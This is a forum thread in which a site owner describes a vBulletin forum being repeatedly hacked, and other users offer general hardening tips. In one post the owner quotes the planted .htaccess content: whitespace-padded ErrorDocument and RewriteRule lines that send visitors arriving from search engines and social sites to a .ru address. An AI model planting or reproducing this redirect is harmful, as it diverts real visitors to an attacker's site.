LOL Ive Been hacked, How Do I Patch Up

sapo

Power Member
Joined
Feb 25, 2008
Messages
510
Reaction score
286
my site been hacked.

They added a simple hidden iframe in my footer of my vbulltien forum not the first time. I Usually just delete it and move on. But this time they attacked like crazy they changed all my .htaccess to some rewrite to some .ru site . I am asking how can they do this, i changed all my password etc.

Well better then how, how can I fix my holes in my site, OR will I have to hire someone to go through it or something.
 
Make sure you have all the updates for plugins and CMS, strong passwords (and don't re-use them), don't leave uploading scripts that can get indexed or the default install directory and scripts, make sure your desktop has a proper firewall and antivirus, use secure transmission protocols over the network like SSH, use the best encryption for your wireless network (if it's the case). These are only some ideas I can think of at the moment.

The thing is that there are so many attacking vectors out there and so many possibilities to get owned that you must be constant vigilant and don't let your guard down.

Even so, if the bad guys manage to get a foothold on a site hosted on the same server like yours, you still can get owned due to that weak link in the chain.
 
You need to find and patch the hole(s). I'd check your log files, It could be many things...hard to determine from the info you provided. Maybe restore from backup?
 
Make sure you have all the updates for plugins and CMS, strong passwords (and don't re-use them), don't leave uploading scripts that can get indexed or the default install directory and scripts, make sure your desktop has a proper firewall and antivirus, use secure transmission protocols over the network like SSH, use the best encryption for your wireless network (if it's the case). These are only some ideas I can think of at the moment.

The thing is that there are so many attacking vectors out there and so many possibilities to get owned that you must be constant vigilant and don't let your guard down.

Even so, if the bad guys manage to get a foothold on a site hosted on the same server like yours, you still can get owned due to that weak link in the chain.

Fuck I Dont know what to do, Just got owned again thought I fixed everything and shit, site was only normal for about 5 minutes and bam got hit again.
 
LOL and fucking hostgator is hilarious said they cant help me till I remove all malware coding and get the waring this site may cause harm removed from google before they can start to diaginose what is wrong LMFAO wtf is that.
 
'' LOL '' you've Been hacked?

lol

Well it aint actually funny but after all these years of having sites I never been hacked and they do it to more of a hobby site then anything.

they keep changing my htaccess to this

Code:
ErrorDocument 400 http://aboutconvert.ru/kernel/index.php																														
																														ErrorDocument 401 http://aboutconvert.ru/kernel/index.php																														
																														ErrorDocument 403 http://aboutconvert.ru/kernel/index.php																														
																														ErrorDocument 404 http://aboutconvert.ru/kernel/index.php																														
																														ErrorDocument 500 http://aboutconvert.ru/kernel/index.php																														
																																																																																																																								
																														<IfModule mod_rewrite.c>																														
																														RewriteEngine On																														
																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing)\.(.*)																														
																														RewriteRule ^(.*)$ http://aboutconvert.ru/kernel/index.php [R=301,L]																														
																														RewriteCond %{HTTP_REFERER} ^.*(dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|metabot|dmoz|euroseek|about|icq)\.(.*)																														
																														RewriteRule ^(.*)$ http://aboutconvert.ru/kernel/index.php [R=301,L]																														
																														</IfModule>
 
Take a look at the encoding and filesize of the .htaccess files.

I don't know what it was or how it got in but I seem to have had some luck (so far, knock on wood) with deleting .htaccess files and writing new ones.

We'll see how long it lasts...
 
Do you have all legal and paid for copies of the scripts/software you are using?
 
Do you have all legal and paid for copies of the scripts/software you are using?

yes I do, I have pinned point where it they comming in from, it was a plugin poorly written or I guess good but I was not using it for the version it was intented to be used on, so I disabled that directory and deleted the plugin. changed all password fixxed all .htaccess files, and everything seem back to normal. fucking 18 hours later NO SLEEP but was worth it I love this site.
 
Back
Top